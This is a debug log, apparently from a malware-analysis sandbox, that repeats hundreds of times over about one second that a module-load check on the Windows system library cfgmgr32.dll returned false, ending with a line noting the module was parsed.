2020-03-24 10:13:49,931 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,931 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,994 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,994 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,994 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,119 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,119 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,119 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,119 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,134 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,134 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,134 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,354 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,354 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,354 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,431 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,431 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,665 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,665 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,665 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,665 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,805 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
